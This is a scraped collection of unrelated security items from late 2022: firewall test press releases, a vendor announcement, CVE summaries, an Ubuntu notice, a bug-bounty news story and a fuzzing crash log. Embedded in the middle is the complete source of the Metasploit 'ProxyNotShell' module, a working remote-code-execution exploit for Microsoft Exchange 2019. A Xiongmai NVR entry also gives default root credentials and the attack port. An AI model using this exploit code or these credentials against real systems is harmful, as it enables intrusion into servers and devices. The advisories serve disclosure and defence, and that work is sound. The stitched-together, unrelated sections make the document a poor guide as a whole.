Ratings ranged from AAA to CC, with security effectiveness scores from 27% to 100%.

**AUSTIN, Texas, Dec. 1, 2022 /PRNewswire/ —** CyberRatings.org, the non-profit entity dedicated to providing transparency on cybersecurity product efficacy, has completed an independent test of eight market leading security vendors in its first-ever Cloud Network Firewall comparative evaluation. Forcepoint, Fortinet and Juniper's test reports were published earlier in the year, all with 'AAA' ratings. In this latest release of test reports, Check Point and Versa Networks received a 'AAA' rating. Palo Alto Networks received an 'AA,' Sophos an 'A,' and Cisco 'CC.'

The test covered capabilities considered essential in a firewall including basic routing, access control, SSL / TLS decryption, threat prevention (exploits), evasion, performance, stability and reliability, and management. Amazon Web Services (AWS) was the public cloud service chosen to run the test. Ratings were calculated using a scale from 0 to 800.

Key findings include:  

*   Cloud services assume a shared security model, where cloud providers are responsible for the infrastructure and customers are responsible for securing the applications running on the infrastructure.
*   Roughly 80% of web traffic is encrypted and firewall decryption is not on by default: Firewalls will not see/block attacks delivered via (encrypted) HTTPS unless configured to do so.
*   Security vendors are used to controlling the platform on which their products are installed. In the cloud, they do not have that control; vendors are learning how to operate under these new conditions and there will be challenges.
*   Supply Chain attacks are on the rise. Using the cloud means relying on third parties to maintain software supply chain integrity. APIs, code reuse, open-source libraries, not maintained code, and other shared resources introduce unknown risks.

Security effectiveness scores ranged from 27% to 100%. The security effectiveness tests verified how effectively the firewall protected control network access, applications, and users while preventing threats (exploits and evasions), blocking malicious traffic while under extended load, and remaining resistant to false positives. Exploit block rates ranged from 88.3% to 100%. All products achieved 100% for resistance to evasion techniques.

"Security is your problem, not Amazon's," said Vikram Phatak, CEO of CyberRatings.org. "If you are migrating your data center to the cloud, create a plan for securing it." Phatak added. "And if you needed a firewall for your data center, you probably need one for your cloud deployment."

There are different ways consumers can purchase security products for the cloud. The individual test reports reflect the bring-your-own-license model while the comparative report illustrates the pay-as-you-go pricing. Both pricing models provide consumers with options to compare pricing on items important to their own organizations.

The following products were evaluated:

**Check Point Cloud Network Firewall CloudGuard IaaS R81.20-581**

**AAA**

Cisco Firepower Threat Defense for AWS Version 7.2.0

CC

Forcepoint Cloud Network Firewall v6.11

AAA

Fortinet Cloud Network Firewall v7.0.5 Build 0304(GA)

AAA

Juniper Cloud Network Firewall 22.1R1.1

AAA

Palo Alto Networks Cloud Network Firewall PA-VM-AWS-10.2.2

AA

Sophos Cloud Network Firewall SFOS 19.0.0 GA-Build317

A

Versa Networks Cloud Network Firewall Versa-FlexVNF-21.2.3

AAA

To read the CyberRatings reports go to CyberRatings.org.

Cloud Network Firewall test tools were provided by Keysight (CyPerf and Breaking Point), and TeraPackets Threat Replayer.

**About CyberRatings.org**

CyberRatings.org is a non-profit 501(c)6 entity dedicated to quantifying cyber risk and providing transparency on cybersecurity product efficacy through testing and ratings programs. To become a member, visit www.cyberratings.org.

CyberRatings.org Announces Results from First-of-its-Kind Comparative Test on Cloud Network Firewall

Know what you need to fix today and what you don’t.

**EVERGREEN, Colo., December 1, 2022** **—** Phylum, The Software Supply Chain Security Company, today announced the addition of Automated Vulnerability Reachability to its software supply chain security platform capabilities. With the ability to focus only on fixing what matters_, s_ecurity pros can end the deluge of false positives and developers can innovate with greater speed and confidence. This new introduction, combined with Phylum’s ability to block and prioritize open-source code risks, provides organizations with the most comprehensive software supply chain security available in the market.

Vulnerabilities represent a clear and present danger to the integrity of the software supply chain, but the massive amount of noise and false positives that come with traditional detection methods drain resources and leave organizations overwhelmed.

"Vulnerability management has been a frustrating and persistent challenge for security teams for well over a decade. Phylum has automated the answer to the question, 'Do I actually call the code triggering this vulnerability?' Addressing this question reduces customer false positive vulnerability issues by 90% or more and enables security teams to engage their development teams with supply chain issues that truly matter," said Peter Morgan, co-founder and president of Phylum.

Most vulnerability management approaches do not account for the nuances of open-source libraries. In library code, the parts of the library used are just as important as the package name and version, and not accounting for this data results in an astronomically high false positive rate. For example, an organization might use a package for signing build packages that contains a known Heartbleed vulnerability. But since the organization is only using it for code signing and not using the part of OpenSSL where that vulnerability exists, it isn't reachable. The Phylum Platform recognizes this nuance and informs the user accordingly.

Organizations that use Phylum save precious developer time, make more critical fixes and improve overall security posture by leveraging:

1.  Deep source analysis and call tracing that identifies which vulnerabilities impact projects, and which ones don’t.
2.  Graph-powered analysis that identifies inter-package call paths to prioritize the most impactful bugs that need fixing.
3.  Automated, continuous policy enforcement that provides alerts if vulnerability functions change due to new development needs.

Since software projects are made up of anywhere from 70%-90% of open-source code, Phylum first blocks software supply chain attacks trying to enter environments from open-source packages. This alleviates the burden of having to do extensive remediation once source code is built. Automated Vulnerability Reachability then continuously monitors the code in the event any development, package or author changes result in new vulnerabilities.

The Phylum Software Supply Chain Security Platform is purpose-built to address persistent and evolving software supply chain security challenges. Regardless of the maturity stage of an appsec program, Phylum is designed to address immediate needs and scale with an organization to meet future needs.

Automated Vulnerability Reachability will be available in Q1 2023 via SaaS and On-Prem. Book a demo here.

**About Phylum**  
Phylum is on a mission to secure the universe of code. Its platform automates software supply chain security to block new risks, prioritize existing issues and allow users to only use open-source code that they trust. The company is built by a team of career security researchers and developers with decades of experience in U.S. Intelligence Community and commercial sectors. Phylum is the winner of the Black Hat 2022 Innovation Spotlight Competition and was named a Top Infosec Innovator by Cyber Defense Magazine. Learn more at https://phylum.io, read The Phylum Research Blog, and follow us on LinkedIn and Twitter.

Phylum Expands Its Software Supply Chain Security Capabilities, Introduces Automated Vulnerability Reachability

Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow authenticated users to execute arbitrary commands as root, as exploited in the wild starting in approximately 2019. A remote and authenticated attacker, possibly using the default admin:tlJwpbo6 credentials, can connect to port 34567 and execute arbitrary operating system commands via a crafted JSON file during an upgrade request. Since at least 2021, Xiongmai has applied patches to prevent attackers from using this mechanism to execute telnetd.

CVE-2022-45045: Xiongmai IoT Exploitation - Blog - VulnCheck

This Metasploit module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only supports Exchange Server 2019. These vulnerabilities were patched in November 2022.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange ProxyNotShell RCE',        'Description' => %q{          This module chains two vulnerabilities on Microsoft Exchange Server          that, when combined, allow an authenticated attacker to interact with          the Exchange Powershell backend (CVE-2022-41040), where a          deserialization flaw can be leveraged to obtain code execution          (CVE-2022-41082). This exploit only support Exchange Server 2019.          These vulnerabilities were patched in November 2022.        },        'Author' => [          'Orange Tsai', # Discovery of ProxyShell SSRF          'Spencer McIntyre', # Metasploit module          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis          'Piotr Bazydło', # Vulnerability analysis          'Rich Warren', # EEMS bypass via ProxyNotRelay          'Soroush Dalili' # EEMS bypass        ],        'References' => [          [ 'CVE', '2022-41040' ], # ssrf          [ 'CVE', '2022-41082' ], # rce          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]        ],        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => ['windows'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Windows Dropper',            {              'Platform' => 'windows',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper            }          ],          [            'Windows Command',            {              'Platform' => 'windows',              'Arch' => [ARCH_CMD],              'Type' => :windows_command            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'AKA' => ['ProxyNotShell'],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])    ])    register_advanced_options([      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])    ])  end  def check    @ssrf_email ||= Faker::Internet.email    res = send_http('GET', '/mapi/nspi/')    return CheckCode::Unknown if res.nil?    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'    # actually run the powershell cmdlet and see if it works, this will fail if:    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)    #   * the exchange emergency mitigation service M1 rule is in place    return CheckCode::Safe unless execute_powershell('Get-Mailbox')    CheckCode::Vulnerable  rescue Msf::Exploit::Failed => e    CheckCode::Safe(e.to_s)  end  def ibm037(string)    string.encode('IBM037').force_encoding('ASCII-8BIT')  end  def send_http(method, uri, opts = {})    opts[:authentication] = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'preferred_auth' => 'NTLM'    }    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"      opts[:headers] = {        'X-Up-Devcap-Post-Charset' => 'IBM037',        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362        'User-Agent' => "UP #{datastore['UserAgent']}"      }    else      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"    end    super(method, uri, opts)  end  def exploit    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not    # work on Exchange Server 2016    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)      vprint_status("Detected Exchange version: #{version}")      if version < Rex::Version.new('15.2')        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')      end    end    @ssrf_email ||= Faker::Internet.email    case target['Type']    when :windows_command      vprint_status("Generated payload: #{payload.encoded}")      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager({ linemax: 7_500 })    end  end  def execute_command(cmd, _opts = {})    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <ResourceDictionary        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"        xmlns:System="clr-namespace:System;assembly=mscorlib"        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">          <ObjectDataProvider.MethodParameters>            <System:String>cmd.exe</System:String>            <System:String>/c #{cmd.encode(xml: :text)}</System:String>          </ObjectDataProvider.MethodParameters>        </ObjectDataProvider>      </ResourceDictionary>    XAML    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <Obj N="V" RefId="14">        <TN RefId="1">        <T>System.ServiceProcess.ServiceController</T>          <T>System.Object</T>        </TN>        <ToString>Object</ToString>        <Props>          <S N="Name">Type</S>          <Obj N="TargetTypeForDeserialization">            <TN RefId="1">              <T>System.Exception</T>              <T>System.Object</T>            </TN>            <MS>              <BA N="SerializationData">                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}              </BA>            </MS>          </Obj>        </Props>        <S>          <![CDATA[#{xaml}]]>        </S>      </Obj>    IDENTITY    execute_powershell('Get-Mailbox', args: [      { name: '-Identity', value: identity }    ])  endendclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream  include Msf::Util::DotNetDeserialization  def self.generate    from_values([      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(        class_info: Types::General::ClassInfo.new(          obj_id: 1,          name: 'System.UnitySerializationHolder',          member_names: %w[Data UnityType AssemblyName]        ),        member_type_info: Types::General::MemberTypeInfo.new(          binary_type_enums: %i[String Primitive String],          additional_infos: [ 8 ]        ),        member_values: [          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 2,            string: 'System.Windows.Markup.XamlReader'          )),          4,          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 3,            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'          ))        ]      ),      Types::RecordValues::MessageEnd.new    ])  endend

Microsoft Exchange ProxyNotShell Remote Code Execution

Ubuntu Security Notice 5750-1 - It was discovered that GnuTLS incorrectly handled certain memory operations. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service.

    =========================================================================Ubuntu Security Notice USN-5750-1November 30, 2022gnutls28 vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:GnuTLS could be made to crash if it received specially crafted networktraffic from an authenticated client.Software Description:- gnutls28: GNU TLS libraryDetails:It was discovered that GnuTLS incorrectly handled certain memoryoperations. A remote attacker could possibly use this issue to cause GnuTLSto crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:  libgnutls30                     3.4.10-4ubuntu1.9+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5750-1  CVE-2021-4209

Ubuntu Security Notice USN-5750-1

The IPsec VPN blade has a dedicated portal for downloading and connecting through SSL Network Extender (SNX). If the portal is configured for username/password authentication, it is vulnerable to a brute-force attack on usernames and passwords.

Solution could not be found in the system.

CVE-2022-23746: Support, Support Requests, Training, Documentation, and Knowledge base for Check Point products and services

The NSS Labs archive, available with free registration, consists of over 800 test reports, analyst briefs, and research published by NSS Labs from 2013 — 2020.

**AUSTIN, Texas, Nov. 29, 2022 /PRNewswire/** — CyberRatings.org, the nonprofit entity dedicated to providing transparency on cybersecurity product efficacy, has launched The NSS Labs archive, a library of over 800 test reports, analyst briefs and research published by NSS Labs from 2013 – 2020. Once available only to paid subscribers, CyberRatings.org is providing The NSS Labs archive to the community at no charge.

NSS Labs was an independent analysis and testing company recognized for its fact-based cybersecurity guidance that ceased operations on Oct. 15, 2020. Based in Austin, Texas, NSS Labs tested security products protecting networks, data centers, and endpoints for security effectiveness, evasions, performance, stability, and usability. It was in the early stages of producing methodologies for cloud testing when the company closed.

Following the NSS Labs closure, CyberRatings.org acquired some of the assets from the custodians of NSS Labs, including domain name, test data, and reports previously published on their website. The website also holds press releases and blogs over the last six years of the company's existence showing a timeline for the former company's development.

"The NSS Labs team produced a tremendous amount of volume year over year that can now serve as historical reference on security product efficacy," says Vikram Phatak, CEO of CyberRatings.org. "For example, some product scores demonstrated improvement over time while others went the opposite direction. We believe this is a good way to help consumers see how products have evolved."

Product reports and comparative reports from 2013 — 2020 listed below are now available in the following technology verticals:

*   Data Center Security
*   Endpoint Security (including Advanced Endpoint Protection and Browser)
*   Next Generation Firewall (NGFW)
*   Next Generation Intrusion Prevention System
*   Secure Sockets Layer / Transport Layer Security (SSL / TLS)
*   Software-Defined Wide Area Network (SD-WAN)

The NSS Labs archive can be accessed through www.nsslabs.com and www.cyberratings.org.

**Additional Resources**

*   Follow CyberRatings.org on Twitter
*   Follow CyberRatings.org on LinkedIn

**About CyberRatings.org**

CyberRatings.org is a nonprofit 501(c)6 entity dedicated to quantifying cyber-risk and providing transparency on cybersecurity product efficacy through testing and ratings programs. To become a member, visit www.cyberratings.org

SOURCE: CyberRatings.org

CyberRatings.org Revives NSS Labs Research

The WP Affiliate Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.3.9. This is due to missing or incorrect nonce validation on various functions including the affiliates_menu method. This makes it possible for unauthenticated attackers to delete affiliate records, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

It is a known fact that having an affiliate program is the most powerful way to market your products or services online (Read more on the benefits of affiliate program).

If you own a WordPress blog/site and your answer to the following questions are ‘yes’ then the ‘WordPress Affiliate Platform’ is what you need:

1.  _Do you sell products or services online from your WordPress blog/site?_
2.  _Do you want to increase your sales and explode your profits by using an affiliate program?_
3.  _Do you want to have your own affiliate program so you can cut the middle man and build your own brand?_

**WordPress Affiliate Plugin Summary**

The **WordPress Affiliate Platform** is an easy to use WordPress plugin for affiliate recruitment, management and tracking that can be used on any WordPress blog or site. This plugin lets you run your own affiliate campaign/program and allows you to reward (pay commission) your affiliates for referring sales.

The admin can configure banners, links and creatives which the affiliates can use on their site to drive traffic to your site. All the clicks, leads, sales etc are tracked by this plugin.

WP Affiliate plugin turns WordPress into the best affiliate campaign management platform

If you are running online ad campaigns for your products and services then you can use the affiliate platform plugin to measure the true conversion rate of each campaign to find out the profitable ones. This allows you to weed out the non-profitable campaigns and save money in the process.

In a nutshell, the Affiliate Platform Plugin will help you achieve the following:

*   Launch your affiliate campaign in a short time.
*   Monitor clicks and conversions of visitors sent by your affiliates.
*   Maintain your brand with your own product Ad Banners, Links and Creatives.
*   Drive more traffic to your landing/sales page from your Affiliate’s site.
*   Significantly BOOST revenue with more sales.

_We use this plugin to run our affiliate program and it has had a positive effect on our product sales._

**How WP Affiliate Plugin Works**

Affiliate marketing is a type of performance-based marketing where you (the store owner) reward affiliates for sending customers to your site. The following page explains how it all works:

*   How the WordPress Affiliate Platform Works

**WP Affiliate Plugin Features**

Some key features of the WordPress Affiliate Platform include:

*     
    **Easy Installation**
    
    Easy installation like any other WordPress plugin and very easy to use. Seamlessly integrates with your website’s look and feel.
    
*     
    **Real Time Reporting**
    
    Real time reporting. All data (clicks, sales, commissions) are tracked, computed and displayed realtime with no delay.
    
*     
    **Accurate Commission Calculation**
    
    Affiliate commissions are calculated accurately and awarded to the affiliate after a confirmed sale.
    
*     
    **Two Tier Affiliate Structure**
    
    Can be configured to use as a two-tier affiliate structure.
    
*     
    **Easy Affiliate Management**
    
    View your affiliate details, commission level, account status etc. Easily change commission, edit affiliate details, view affiliate referrals, commissions and much more.
    
*     
    **Self Managed Affiliate Area**
    
    Your affiliates will be able to create an account, log into their affiliate account and get ad code, view referrals, commissions and payout details.
    
*     
    **Affiliate Ad Code**
    
    You can offer text and image ads to your affiliates. Your affiliates will be able to copy the ad code and use it to refer visitors.
    
*     
    **Offer Creatives**
    
    You have the ability to offer creatives (pre written text copy that) to your affiliates. Your affiliates can use it to promote your products easily.
    
*     
    **Referral Link Generator**
    
    It comes with a built-in link generation tool in the affiliate area. Your affiliates can use this tool to generate referral link and share it easily via email, facebook, twitter etc.
    
*     
    **Offer Signup Bonus**
    
    You can offer one time signup bonus to your affiliates. This can help you attract more affiliates to join you.
    
*     
    **Autoresponder Integration**
    
    It can be integrated with Autoresponders (AWeber, MailChimp, GetResponse, Mailpoet, Madmimi). This way the affiliates automatically get added to your list/campaign for email marketing purpose.
    
*     
    **Unlimited Affiliates**
    
    No limit on the number of affiliates you can have and no monthly fees to use this plugin. Have as many affiliates as you want!
    
*     
    **Manually Approve Affiliates**
    
    You can choose to manually approve each affiliate account. There is also an option to send the affiliate an email when you have reviewed the application and approved the account.
    
*     
    **Commission Notification**
    
    You can configure email notification that will be sent to your affiliate and you, when an affiliate receives a commission.
    
*     
    **$0 Commission Recording**
    
    Ability to enable or disable $0 commission recording. If the commission from a transaction is $0, you will be able to show or hide it.
    
*     
    **Option to Show EPC Data**
    
    Ability to show the EPC (Earnings Per Click) data to your affiliates in their affiliate portal (under the sales menu).
    
*     
    **Export Data to CSV File**
    
    Ability to export all your affiliate commissions data to a CSV file so you can view it using Excel. You can export your affiliate leads data to a CSV file also.
    
*     
    **Multi Site License**
    
    When you buy the WP Affiliate Platform plugin you can use it on as many sites as you own (you gotta love that!). There is no “Developer Option” here. One low price entitles you to use the plugin on all of your sites.
    
*     
    **Plugin Stability**
    
    Our plugin code-base is very stable. We put a lot effort into testing and developing our plugins so it doesn’t break your site after you upgrade.
    
*     
    **Easy Integration with Most WordPress Shopping Carts**
    
    Integrates with most WordPress shoping carts including WooCommerce, eShop, Shopp plugin, Cart66, WP Shopping Cart etc. Check the integration section on our documentation page to see the full details of the available pre-made integration options.
    
*     
    **Fully Integrates with WP eStore**
    
    Fully integrates with the WordPress eStore (WordPress Shopping Cart) plugin. Selling products from your WordPress site using the WP eStore plugin is quick and easy.
    
*     
    **PayPal Button Integration**
    
    You can easily integrate this affiliate plugin with PayPal buttons that you create from your PayPal account. It can work for both one time and subscription PayPal payment buttons.
    
*     
    **Integrates with Some Hosted Shopping Carts**
    
    Affiliate platform integrates with some hosted shopping carts like e-Junkie, FoxyCart, Ecwid etc. Check the integration section of our documentation page to see the full details of the available integration options.
    
*     
    **Easy Integration with WooCommerce Plugin**
    
    The affiliate plugin easily integrates with the WooCommerce plugin. When your customers complete a sale via Woo Commerce, the plugin awards the commission to the appropriate affiliate (if any). You can also integrate WooCommerce coupons with this plugin to track and award commission based on the coupon that was used in the transaction.
    
*     
    **Easy Integration with the WP-eCommerce Plugin**
    
    Can be easily integrated with the GetShopped WP-eCommerce plugin. You can view the WP eCommerce plugin integration details on our integration documentation page.
    
*     
    **Integration with Gravity Forms Plugin**
    
    Can be integrated with the Gravity forms plugin to capture leads referred by your affiliates. It also integrates with their pricing fields option.
    
*     
    **Integrates with WishList Member plugin**
    
    Can be integrated with the WishList Member plugin (Create Membership Site) when using PayPal buttons.
    
*     
    **Developer Integration**
    
    Developers can integrate the wordpress affiliate plugin with any shopping cart or a plugin via the API (read the 3rd party integration post to understand what is involved in such an integration).
    
*     
    **Works with HTTPS Pages**
    
    Affiliate Platform plugin works with https pages out of the box (useful if you are using an SSL certificate on your website).
    
*     
    **Always Kept Upto Date**
    
    We keep our plugins upto date to work with the latest version of WordPress. We have been doing this for 5+ years so rest assured that our plugins will always be compatible with any future WordPress updates.
    
*     
    **Free Future Upgrades**
    
    Free future improvements and upgrades (there is no annual fee). You will always have access to the latest version of the plugin for free.
    
*     
    **Great Support**
    
    Tired of listening to fake support promises? Checkout our customer only forum to see how we handle product related issues (usually within 24 hours). Our support forum is moderated by the developers who created the plugin(s).
    

**Affiliate Platform Plugin Demo**

Click on the following button to view live demo of the affiliate area that you will be able to create with this plugin:

**Documentation & Technical Support**

*   Documentation page (Contains all the documentation for the WP Affiliate Platform plugin)

If you are having any issue with this plugin then feel free to post it on the customer only support forum.

Please make sure you visit the demo and the documentation page so you understand the capability of this plugin. Do not assume that this plugin will magically work with a 3rd party plugin/solution that is not listed in the “Integration” section of the documentation page. Contact us if you are unsure about something and we will try to clarify it for you.

**Customer Feedback**

We won’t waste your time with fake testimonials! Checkout the customer feedback page and see what some of our customers have to say about us.

I meant to say this the other day: your customer support is EXCELLENT! Pre-sales or post sales, you always get back – it’s such a pleasure to work with you!

Combined costs for both products is a steal for the amount of functionality I get. A forthcoming review on my site will reflect that – I hope I can support you any way I can.

**Jay Versluis  
**http://www.versluis.com/

You can also check the comment section below for more customer feedback.

**Buy the WordPress Affiliate Platform**

Summary

App Category

WordPress Plugin

Software Name

WordPress Affiliate Platform

Version

6.4.0

Date Modified

2022-11-01

Operating System

WordPress 6.1

Requirements

WordPress 5.5 or higher

Description

WordPress affiliate management plugin for automatic affiliate recruitment, management and referral tracking

File Format

application/zip

Easy Affiliate Program for WordPress blog or site. (**Includes Free Lifetime Updates**)

Get the Affiliate Software now and start building your sales army!

**Frequently Bought Together**

See the Products page for more bundled product deals.

**WP Affiliate Platform Questions (F.A.Q)**

CVE-2022-3898: WP Affiliate Plugin - Affiliate Program Management Plugin

Security researcher scores $10K bug bounty

John Leyden 29 November 2022 at 16:30 UTC

Security researcher scores $10K bug bounty

A security researcher has released details of how they were able to hack Intel’s Data Center Manager (DCM).

More specifically, Julien Ahrens of RCE Security succeeded in bypassing Intel DCM’s authentication by spoofing Kerberos and LDAP (Lightweight Directory Access Protocol) responses, creating an exploit chain that they claim yielded remote code execution (RCE) in the process.

Intel acknowledges that Ahrens uncovered a vulnerability – tracked as CVE-2022-33942 and assessed with a severity score of 8.8 – but disputes its seriousness. According to Intel, the issue represents only a privilege elevation flaw rather an RCE risk.

“A protection mechanism failure in the Intel DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access,” a summary by Mitre Corp explained.

Despite the contended vulnerability disclosure process, Ahrens argued successfully enough for Intel to make a one-time exception and reward the researcher with a $10,000 bug bounty – much more than it would normally pay out for this class of security problem.

Catch up with the latest enterprise security news

Intel’s Data Centre Manager Console offers a real-time monitoring and management dashboard that can be used to manage an array of data center assets. Ahrens uncovered vulnerabilities in the product through a source code review of the decompiled application.

Some aspects of the painstaking work that followed and its results may be relevant to other security researchers and technology developers.

“It was the first time I discovered this kind of vulnerability, mainly because I barely looked at Active Directory-integrated software,” Ahrens told The Daily Swig.

“However, it might be the case that other vendors suffer from the same type of vulnerability if they don’t validate the user-defined authentication domain (which, however, should be done since it’s part of the overall authentication schema).”

**Technical write-up and sequel**

The researcher has published the main aspects of his findings in a detailed technical blog post that recounts the main aspects of the story. A second blog post is due out later this week.

The freelance penetration tester and security researcher added: “This specific bug also always depends on a configured Active Directory group with a well-known SID \[security identifier\] – so it does not apply to Active Directory implementations, per se.

“You could theoretically also exploit this using single user or custom group objects that don’t have a well-known SIDs, but that would require the attacker to either be able to guess, predict, or leak it somehow else.”

According to Ahrens. Intel resolved the vulnerability by enforcing LDAP-based \[controls\] and performing an additional certificate check against DCM’s internal SSL keystore, where the Active Directory CA certificate needs to be trusted.

In response to queries from The Daily Swig, Intel said it had issued a public security advisory for the issue as part of its usual process. “It’s resolved via an update to Intel® DCM software version 5.0 or later,” an Intel spokesperson added.

YOU MAY ALSO LIKE Zendesk Explore flaws opened the doors to account pillage

Intel disputes seriousness of Data Centre Manager authentication flaw

GPAC v2.1-DEV-rev478-g696e6f868-master was discovered to contain a heap use-after-free via the Q_IsTypeOn function at /gpac/src/bifs/unquantize.c.

**Description**

Heap use after free in Q\_IsTypeOn at gpac/src/bifs/unquantize.c:175:12

**System info**

Ubuntu 20.04 lts

**Version info**

MP4Box - GPAC version 2.1-DEV-rev478-g696e6f868-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration: --enable-sanitizer --enable-debug
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_FAAD GPAC\_HAS\_MAD GPAC\_HAS\_LIBA52 GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_FFMPEG GPAC\_HAS\_THEORA GPAC\_HAS\_VORBIS GPAC\_HAS\_XVID GPAC\_HAS\_LINUX\_DVB

**compile**

./configure --enable-sanitizer --enable-debug
make

**crash command****POC**

POC-uaf

**Crash output**

/home/zw/AFL\_Fuzz\_Datas/gpac/bin/gcc/MP4Box -bt poc

\[iso file\] Unknown box type vref in parent dinf
\[iso file\] Missing dref box in dinf
\[iso file\] Unknown box type vref in parent dinf
\[iso file\] Missing dref box in dinf
MPEG-4 BIFS Scene Parsing
=================================================================
==1578219==ERROR: AddressSanitizer: heap-use-after-free on address 0x610000001ad4 at pc 0x7f8194636c1d bp 0x7fff91f55420 sp 0x7fff91f55418
READ of size 4 at 0x610000001ad4 thread T0
    #0 0x7f8194636c1c in Q\_IsTypeOn /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/unquantize.c:175:12
    #1 0x7f8194643390 in gf\_bifs\_dec\_unquant\_field /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/unquantize.c:398:7
    #2 0x7f81945890e1 in gf\_bifs\_dec\_sf\_field /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:84:7
    #3 0x7f8194597e3f in BD\_DecMFFieldList /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:327:8
    #4 0x7f819459cd2f in gf\_bifs\_dec\_field /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:564:9
    #5 0x7f819459df3a in gf\_bifs\_dec\_node\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:626:7
    #6 0x7f81945965a8 in gf\_bifs\_dec\_node /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:928:7
